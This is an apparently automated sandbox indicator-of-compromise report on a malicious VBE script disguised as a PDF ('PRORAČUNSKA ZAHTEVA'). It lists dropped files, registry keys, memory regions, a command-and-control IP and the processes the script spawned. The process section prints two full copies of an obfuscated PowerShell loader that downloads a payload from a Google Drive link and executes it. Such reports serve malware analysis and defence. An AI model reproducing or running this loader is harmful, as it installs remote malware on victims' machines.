IOC Report
PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe

loading gif

Files

File Path
Type
Category
Malicious
PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f21l2rrq.4hp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phyf1my5.4aa.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpbhzuw5.bia.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vu00q5i3.ua0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\188E93\31437F.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\188E93\31437F.lck
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Drgs.Trs
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfruhindes ' ipho$Hastvg T erLSkrfeoReemeBA oriaPolyml Hand: aarbmFl voiBaadelGladliIndfaeOppusU MoersMillikligniAUnmitd KamfE .elelprisbIBudgegT ryhtPocan=ComfinR sereSlibeW Blot-Tilryo ,orrb Ro ojJa.tfEMeso cDentitClavi Ukldes Vejty SkadsSlagiT ftjeE Van MProgr. ncolnGudsbEStikktOsten.p stpwCroupEDistrbExcu CTa,nilTaxieI FrilE orhaNSk altSweet ');Electroendosmosis ($Gaveled);Electroendosmosis (Jomfruhindes 'Panel$DyrekMRancoiC urclK,nfeiEssayeParatu int sUnderkOverbaTegledP skeeKongelOver.i SkrugBrekrtAdeno.Fr igH uniceHighba OrbidBe tie egrr enits Unca[Excom$GeophAVandsmBiosye apidrForfri bankkStenbaU pilnDevitiOb,ats birdmTerrne Tan n NicosFedt,] ccul= Da b$SecerDVend ig urmnMan.ddenkeleSkov rA ers ');$Slagsidens=Jomfruhindes ',epit$A.titM StudiWi djl iddiSterneCrep,uUnfris S ikk B,agaTrokidKrydse alaclSkrifi jagtgUd mpt S.el.J ggiDDupleoHelbrwVarefn Ov rlBioeloMisalaPa.amdPortuFUnduliblo blK onveLibet(Mygge$LoversCommuacholemOverblTremasjusten Filti yzonnTrykvgCossisIndsm, effi$EclecN Carao Muren Una lluftnemiskupS nktin tvrd lasto DrowpUni ktTextue nerkrSkudsaDimounPrvet)Tamir ';$Nonlepidopteran=$Allende;Electroendosmosis (Jomfruhindes 'Heave$Gleemg oloslA gloo TotabH deraUnmerLObduc:Dir eOJ mfrRSamdeITermig ProgIF oddN KoinaTenenLJa.niIQu.entEdeagiSurfieStrutSCongr=Unnat(DiscotKa,pheDiletSSkoldta,omf-Hy anp Va.aAFede,Tt rdih ell Imple$ha deN L ehoInfinN,ecallBubbie VipppHenreIe,figD DimiOokkulp SirbTSlgtsEekskoR ,eadaHomieNAgari)Sooth ');while (!$originalities) {Electroendosmosis (Jomfruhindes 'Bruge$Klinkg Za,rlAnthoo .seubStok a P lalSetn : DraaALivtavAntioistrygaStricto erpi RocknMandag Smoo=To zl$NoveltA rmar GrunuPopedeP lpe ') ;Electroendosmosis $Slagsidens;Electroendosmosis (Jomfruhindes 'RaffiSVerm,tKrydsaOphrerBrugstBolig- HabaSDistelSmkkyeFrifie GreypStaal Ch ys4Unyok ');Electroendosmosis (Jomfruhindes ' uadr$Untung KattlTyvetoToad,b ampa ennlFrank:grafiobioder unsuiIn exgOpraaiOverlnStadiaAnnitlOversi AlintSaddliU,phyeintersKnowe=Synkr( miniTDetleebemeasHarlet.enth- rankP .olaa Bloct titth,ebin Cohel$DistrN indfoSuggenknolll Ha eeIn enpMtniniFarerdFlugtoForbrpGdnintChikkeMaalerBilfrasurrenBorge)Tidal ') ;Electroendosmosis (Jomfruhindes 'St.nd$ BeatgHeparlL.stooStaphbSmileaKommulDomka:W nklN MycoeFdekdd.apperShalteRrt,svSkaldnPalaneGidse=Immun$Afslug imetlSvinsoNeds,bber na SlaglUnma : Pha M HomoiSkedecAfficr Ta soF,aadsUnreccKvgproSkinfp hoseiIndrecStr gs Neur+,vers+Konom%,erri$DroppTCc.slrBloopa SorgcglanstGermas eat.Xero cVagteo xtrauPraeanbraistEvent ') ;$samlsnings=$Tracts[$Nedrevne];}$Frastdtes=308914;$Tracheloclavicular=31475;Electroendosmosis (Jomfruhindes 'Trsko$forelgRagnelLoa aoBotelbMana,a AgonlGr.in: CornBBiopsuMulchrAma,ri,ugleeR,achr An isSnitm Opdat=Trans unki G Proce .nmetMilen-PukkeC .ofloBaandnB rigtascleeepoxynVejsytMim o Bibli$ EndoNArbejoTilstn,ebutlKi,skeGennepMortiiTownfdRasteorummepSelvmtAnsgneMeetirLaveraSku ln ook ');Electroendosmosis (Jomfruhindes ' Blom$ MonogSp ldlTrykaoW keybTr phaJonbylIsod.: lamU orpun nnelisl,nitRupica Gagercard i VikisHot lmUfoeneB cycsTutam Seig = weal Imb u[ SkruS Ke oy Samms,revvt PhaleSie.em Rush. ottlC .meto .iatnPhilav UbeteFir.erHyb itPulvi]Overk:Rejs :E hveFoverorFlyveo.ankkmKimonB JumbaHardwsZink eRadio6Pro.e4ElectSfredstSubver gtesi S ganUnwarg inal(Bor e$ RemaBLoc,lufelt rFremki SacceHorlarD duks mpev) Merc ');Electroendosmosis (Jomfruhindes 'Victr$Ve seg Dinol nthroBlussb Solda Lev l H ni: LocaMUnreqeshe paB ushtTriambStiftaReverlOverclVigan1Dik,e8Osage9 Upfl Pre e=Vanad dragn[IdentSbrnemy syksD bdetBeg,ie AiremMorda.BordeTterrieMa acxTermotNonde.MountEK ttenOtt,mcBy,enoLagerd,cripiUndernSimengEndoc]an st:il.um: HallAbltesSFryseC t anITrau.IStorf.TeateGDiwateStillt A arSNon nt G nrr ,krui TarnnVasocg Egal(J.ywa$ roliUCingunBiweei Kat.t Hylea ,ccir,rianiAfprvs IngmmLresteFinalsI.cor)Analy ');Electroendosmosis (Jomfruhindes 'Sovek$RastegPreimlHjlpeo,crubbPitcha AnthlAsser:SkoleYUnflua BelysH milmWickeaAgorakshurl=Teich$ Re nMDruesep.chya Nyctt Pa,sbB lafaNonpalSaintl N.ri1Plowm8Skili9 ,vis.WhatesSammeusemipbYar tsKillytChiror.urioiCowbonPhysigPansc(Thali$TankaFS gnar S alaTi fosG myttHjlandC,ecktKrybbeFremss Elig,sols $PerilT ModerFreakaKolpoc trafhrecureOverslRegeloR assc,ennel HgtnaEftervPremai Senicsynkou Grufl .gesah,ndlrArou )Normy ');Electroendosmosis $Yasmak;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfruhindes ' ipho$Hastvg T erLSkrfeoReemeBA oriaPolyml Hand: aarbmFl voiBaadelGladliIndfaeOppusU MoersMillikligniAUnmitd KamfE .elelprisbIBudgegT ryhtPocan=ComfinR sereSlibeW Blot-Tilryo ,orrb Ro ojJa.tfEMeso cDentitClavi Ukldes Vejty SkadsSlagiT ftjeE Van MProgr. ncolnGudsbEStikktOsten.p stpwCroupEDistrbExcu CTa,nilTaxieI FrilE orhaNSk altSweet ');Electroendosmosis ($Gaveled);Electroendosmosis (Jomfruhindes 'Panel$DyrekMRancoiC urclK,nfeiEssayeParatu int sUnderkOverbaTegledP skeeKongelOver.i SkrugBrekrtAdeno.Fr igH uniceHighba OrbidBe tie egrr enits Unca[Excom$GeophAVandsmBiosye apidrForfri bankkStenbaU pilnDevitiOb,ats birdmTerrne Tan n NicosFedt,] ccul= Da b$SecerDVend ig urmnMan.ddenkeleSkov rA ers ');$Slagsidens=Jomfruhindes ',epit$A.titM StudiWi djl iddiSterneCrep,uUnfris S ikk B,agaTrokidKrydse alaclSkrifi jagtgUd mpt S.el.J ggiDDupleoHelbrwVarefn Ov rlBioeloMisalaPa.amdPortuFUnduliblo blK onveLibet(Mygge$LoversCommuacholemOverblTremasjusten Filti yzonnTrykvgCossisIndsm, effi$EclecN Carao Muren Una lluftnemiskupS nktin tvrd lasto DrowpUni ktTextue nerkrSkudsaDimounPrvet)Tamir ';$Nonlepidopteran=$Allende;Electroendosmosis (Jomfruhindes 'Heave$Gleemg oloslA gloo TotabH deraUnmerLObduc:Dir eOJ mfrRSamdeITermig ProgIF oddN KoinaTenenLJa.niIQu.entEdeagiSurfieStrutSCongr=Unnat(DiscotKa,pheDiletSSkoldta,omf-Hy anp Va.aAFede,Tt rdih ell Imple$ha deN L ehoInfinN,ecallBubbie VipppHenreIe,figD DimiOokkulp SirbTSlgtsEekskoR ,eadaHomieNAgari)Sooth ');while (!$originalities) {Electroendosmosis (Jomfruhindes 'Bruge$Klinkg Za,rlAnthoo .seubStok a P lalSetn : DraaALivtavAntioistrygaStricto erpi RocknMandag Smoo=To zl$NoveltA rmar GrunuPopedeP lpe ') ;Electroendosmosis $Slagsidens;Electroendosmosis (Jomfruhindes 'RaffiSVerm,tKrydsaOphrerBrugstBolig- HabaSDistelSmkkyeFrifie GreypStaal Ch ys4Unyok ');Electroendosmosis (Jomfruhindes ' uadr$Untung KattlTyvetoToad,b ampa ennlFrank:grafiobioder unsuiIn exgOpraaiOverlnStadiaAnnitlOversi AlintSaddliU,phyeintersKnowe=Synkr( miniTDetleebemeasHarlet.enth- rankP .olaa Bloct titth,ebin Cohel$DistrN indfoSuggenknolll Ha eeIn enpMtniniFarerdFlugtoForbrpGdnintChikkeMaalerBilfrasurrenBorge)Tidal ') ;Electroendosmosis (Jomfruhindes 'St.nd$ BeatgHeparlL.stooStaphbSmileaKommulDomka:W nklN MycoeFdekdd.apperShalteRrt,svSkaldnPalaneGidse=Immun$Afslug imetlSvinsoNeds,bber na SlaglUnma : Pha M HomoiSkedecAfficr Ta soF,aadsUnreccKvgproSkinfp hoseiIndrecStr gs Neur+,vers+Konom%,erri$DroppTCc.slrBloopa SorgcglanstGermas eat.Xero cVagteo xtrauPraeanbraistEvent ') ;$samlsnings=$Tracts[$Nedrevne];}$Frastdtes=308914;$Tracheloclavicular=31475;Electroendosmosis (Jomfruhindes 'Trsko$forelgRagnelLoa aoBotelbMana,a AgonlGr.in: CornBBiopsuMulchrAma,ri,ugleeR,achr An isSnitm Opdat=Trans unki G Proce .nmetMilen-PukkeC .ofloBaandnB rigtascleeepoxynVejsytMim o Bibli$ EndoNArbejoTilstn,ebutlKi,skeGennepMortiiTownfdRasteorummepSelvmtAnsgneMeetirLaveraSku ln ook ');Electroendosmosis (Jomfruhindes ' Blom$ MonogSp ldlTrykaoW keybTr phaJonbylIsod.: lamU orpun nnelisl,nitRupica Gagercard i VikisHot lmUfoeneB cycsTutam Seig = weal Imb u[ SkruS Ke oy Samms,revvt PhaleSie.em Rush. ottlC .meto .iatnPhilav UbeteFir.erHyb itPulvi]Overk:Rejs :E hveFoverorFlyveo.ankkmKimonB JumbaHardwsZink eRadio6Pro.e4ElectSfredstSubver gtesi S ganUnwarg inal(Bor e$ RemaBLoc,lufelt rFremki SacceHorlarD duks mpev) Merc ');Electroendosmosis (Jomfruhindes 'Victr$Ve seg Dinol nthroBlussb Solda Lev l H ni: LocaMUnreqeshe paB ushtTriambStiftaReverlOverclVigan1Dik,e8Osage9 Upfl Pre e=Vanad dragn[IdentSbrnemy syksD bdetBeg,ie AiremMorda.BordeTterrieMa acxTermotNonde.MountEK ttenOtt,mcBy,enoLagerd,cripiUndernSimengEndoc]an st:il.um: HallAbltesSFryseC t anITrau.IStorf.TeateGDiwateStillt A arSNon nt G nrr ,krui TarnnVasocg Egal(J.ywa$ roliUCingunBiweei Kat.t Hylea ,ccir,rianiAfprvs IngmmLresteFinalsI.cor)Analy ');Electroendosmosis (Jomfruhindes 'Sovek$RastegPreimlHjlpeo,crubbPitcha AnthlAsser:SkoleYUnflua BelysH milmWickeaAgorakshurl=Teich$ Re nMDruesep.chya Nyctt Pa,sbB lafaNonpalSaintl N.ri1Plowm8Skili9 ,vis.WhatesSammeusemipbYar tsKillytChiror.urioiCowbonPhysigPansc(Thali$TankaFS gnar S alaTi fosG myttHjlandC,ecktKrybbeFremss Elig,sols $PerilT ModerFreakaKolpoc trafhrecureOverslRegeloR assc,ennel HgtnaEftervPremai Senicsynkou Grufl .gesah,ndlrArou )Normy ');Electroendosmosis $Yasmak;"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
There are 7 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://137.184.191.215/index.php/check.php?id=1
137.184.191.215
malicious
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.googP
unknown
https://wordpress.org/documentation/article/faq-troubleshooting/
unknown
https://drive.usercontent.google.com/
unknown
http://drive.google.com
unknown
https://drive.usercontent.googh8
unknown
https://aka.ms/pscore6lBsq
unknown
https://github.com/Pester/Pester
unknown
https://www.google.com
unknown
https://drive.google.com/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
https://drive.google.com/-
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 15 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.250.184.238
drive.usercontent.google.com
142.250.184.193

IPs

IP
Domain
Country
Malicious
137.184.191.215
unknown
United States
malicious
142.250.184.193
drive.usercontent.google.com
United States
142.250.184.238
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\???????????????????????????????????????????
188E93
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5CFB000
trusted library allocation
page read and write
malicious
8960000
direct allocation
page execute and read and write
malicious
B1AF000
direct allocation
page execute and read and write
malicious
2B4370DF000
trusted library allocation
page read and write
malicious
7070000
direct allocation
page read and write
2B42546D000
heap
page read and write
7FF848F10000
trusted library allocation
page read and write
8990000
direct allocation
page read and write
6130000
direct allocation
page read and write
8320000
heap
page read and write
2B427C2B000
trusted library allocation
page read and write
2F1B000
stack
page read and write
7589000
heap
page read and write
5FA1000
heap
page read and write
7FF848EB0000
trusted library allocation
page read and write
772E000
stack
page read and write
216E0000
heap
page read and write
5CE2000
trusted library allocation
page read and write
217F0000
remote allocation
page read and write
4CA8000
trusted library allocation
page read and write
2152D000
stack
page read and write
7060000
direct allocation
page read and write
F9B6A8A000
stack
page read and write
30D0000
trusted library allocation
page read and write
2B427C43000
trusted library allocation
page read and write
2B43F77A000
heap
page read and write
8610000
trusted library allocation
page read and write
30CD000
trusted library allocation
page execute and read and write
20891E62000
heap
page read and write
2146E000
stack
page read and write
2088FFA0000
heap
page read and write
2B427881000
trusted library allocation
page read and write
2B43F49E000
heap
page read and write
92A0000
direct allocation
page execute and read and write
5F9D000
heap
page read and write
20890390000
heap
page read and write
20891E54000
heap
page read and write
F9B5D3B000
stack
page read and write
2B4274F3000
trusted library allocation
page read and write
20891E5B000
heap
page read and write
7690000
heap
page execute and read and write
2B427C51000
trusted library allocation
page read and write
2B43F5E0000
heap
page read and write
82E0000
trusted library allocation
page read and write
20890109000
heap
page read and write
F9B6B0B000
stack
page read and write
2B425460000
heap
page read and write
7FF848DD0000
trusted library allocation
page read and write
2B43F4A0000
heap
page read and write
2B4254B5000
heap
page read and write
837D000
stack
page read and write
BBAF000
direct allocation
page execute and read and write
30F5000
trusted library allocation
page execute and read and write
2B43F7B4000
heap
page read and write
7890000
trusted library allocation
page read and write
5F67000
heap
page read and write
2089013E000
heap
page read and write
21905000
direct allocation
page read and write
8760000
trusted library allocation
page read and write
3070000
heap
page read and write
7FF848E50000
trusted library allocation
page read and write
6ECE000
stack
page read and write
2089012B000
heap
page read and write
766F000
heap
page read and write
2B428E1A000
trusted library allocation
page read and write
76A8000
trusted library allocation
page read and write
F9B58FE000
stack
page read and write
8910000
trusted library allocation
page execute and read and write
5F9D000
heap
page read and write
330F000
remote allocation
page execute and read and write
89B0000
direct allocation
page read and write
5EF8000
heap
page read and write
311B000
heap
page read and write
2B4254A6000
heap
page read and write
7599000
heap
page read and write
20891E63000
heap
page read and write
5F5C000
heap
page read and write
75DD000
heap
page read and write
2B427501000
trusted library allocation
page read and write
7FF848F40000
trusted library allocation
page read and write
2B437368000
trusted library allocation
page read and write
E30000
heap
page read and write
2B43F760000
heap
page read and write
7FAA0000
trusted library allocation
page execute and read and write
7030000
direct allocation
page read and write
7FF848E60000
trusted library allocation
page read and write
60F0000
direct allocation
page read and write
49F5000
heap
page execute and read and write
208901FE000
heap
page read and write
87F0000
heap
page read and write
3110000
heap
page read and write
20891E7A000
heap
page read and write
7FF848DE0000
trusted library allocation
page read and write
8695000
trusted library allocation
page read and write
8330000
heap
page read and write
2B42756D000
trusted library allocation
page read and write
F9B5B78000
stack
page read and write
DE0000
heap
page read and write
2B427071000
trusted library allocation
page read and write
7208000
heap
page read and write
208901FA000
heap
page read and write
7FF848BCD000
trusted library allocation
page execute and read and write
2B43F783000
heap
page read and write
7730000
trusted library allocation
page read and write
5EF0000
heap
page read and write
20891E6E000
heap
page read and write
214ED000
stack
page read and write
78C0000
trusted library allocation
page read and write
82B7000
stack
page read and write
7850000
trusted library allocation
page read and write
7FF848D60000
trusted library allocation
page read and write
4978000
trusted library allocation
page read and write
6160000
direct allocation
page read and write
2B427801000
trusted library allocation
page read and write
8444000
heap
page read and write
7FF848BDB000
trusted library allocation
page read and write
2B43F7AA000
heap
page read and write
CD0000
heap
page read and write
4A9E000
stack
page read and write
71EA000
heap
page read and write
2B43F6E0000
heap
page read and write
215F0000
heap
page read and write
2B43F51D000
heap
page read and write
7FF848BC4000
trusted library allocation
page read and write
20891F92000
heap
page read and write
2B426E50000
trusted library allocation
page read and write
49F0000
heap
page execute and read and write
2142F000
stack
page read and write
2B4257C0000
heap
page read and write
5F63000
heap
page read and write
7FF848DC0000
trusted library allocation
page read and write
2B428F9C000
trusted library allocation
page read and write
30EA000
trusted library allocation
page execute and read and write
6170000
direct allocation
page read and write
20891E62000
heap
page read and write
8400000
heap
page read and write
30B0000
trusted library allocation
page read and write
2B43F600000
heap
page read and write
2B43F604000
heap
page read and write
7FF848BD0000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page read and write
20891E86000
heap
page read and write
30A0000
trusted library section
